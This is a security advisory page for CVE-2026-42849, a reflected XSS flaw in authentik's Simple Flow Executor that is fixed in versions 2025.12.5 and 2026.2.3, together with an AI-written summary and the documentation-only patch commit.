VYPR
← All advisories
Critical severity9.3NVD Advisory· Published Jun 2, 2026

CVE-2026-42849

CVE-2026-42849

Description

Reflected XSS in authentik's Simple Flow Executor allows session hijacking or token theft.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Reflected XSS in authentik's Simple Flow Executor allows session hijacking or token theft.

Vulnerability

Prior to versions 2025.12.5 and 2026.2.3, authentik's Simple Flow Executor (SFE) contained a reflected Cross-Site Scripting (XSS) vulnerability in the AutosubmitStage. This was due to the SFE's use of jQuery without explicit sanitization to maintain compatibility with legacy browsers, allowing malicious input values to be processed [1].

Exploitation

An attacker can exploit this vulnerability by crafting a malicious request that includes specially designed input within the redirect_uri, particularly when a broad regex is used, or within the state value. This malicious input will be reflected by the SFE, triggering the XSS exploit [1].

Impact

Successful exploitation of this XSS vulnerability can allow an attacker to redirect web requests containing sensitive tokens, hijack user sessions, or perform other malicious actions. The scope of the compromise depends on the context in which the SFE is used, potentially affecting authenticated user sessions [1].

Mitigation

This vulnerability is fixed in authentik versions 2025.12.5 and 2026.2.3. Users are advised to upgrade to these patched versions. No workarounds are specified, and the issue is not listed as being part of the Known Exploited Vulnerabilities (KEV) catalog [1].

References
  1. Reflected XSS in SFE

AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

1
b19f43c8e195

internal: Automated internal backport: CVE-2026-42849.sec.patch to authentik-main (#22303)

https://github.com/goauthentik/authentikauthentik-automation[bot]May 12, 2026via github-commit-search
commit
2 files changed · +28 0
  • locale/en/dictionaries/people.txt+1 0 modified
    @@ -11,3 +11,4 @@ Naur
 Wärting
 Aadit
 Kilby
+Kahmen
  • website/docs/security/cves/CVE-2026-42849.md+27 0 added
    @@ -0,0 +1,27 @@
+# CVE-2026-42849
+
+_Reported by Jan Kahmen, [turingpoint GmbH](https://turingpoint.de/en/)_
+
+## Reflected XSS in SFE
+
+### Summary
+
+Due to the implementation of stages in the SFE (Simple Flow Executor) in order to make the interface more compatible with legacy browsers, it was possible to use an XSS exploit in the AutosubmitStage.
+
+### Patches
+
+authentik 2025.12.5 and 2026.2.3 fix this issue.
+
+### Impact
+
+The SFE (Simple Flow Executor) was susceptible to an XSS exploit. This could allow an attacker to redirect web requests containing tokens, hijack the session or take other malicious actions.
+
+This is possible when an OAuth2 provider is configured, either through the redirect_uri when a very broad regex is used, or through the state value.
+
+The SFE previously used jQuery without explicit sanitization, which, compared to the rest of our interfaces, did not sufficiently protect from malicious input values.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+- Email us at [security@goauthentik.io](mailto:security@goauthentik.io).

Vulnerability mechanics

Synthesis attempt was rejected by the grounding validator. Re-run pending.

References

1

News mentions

0

No linked articles in our index yet.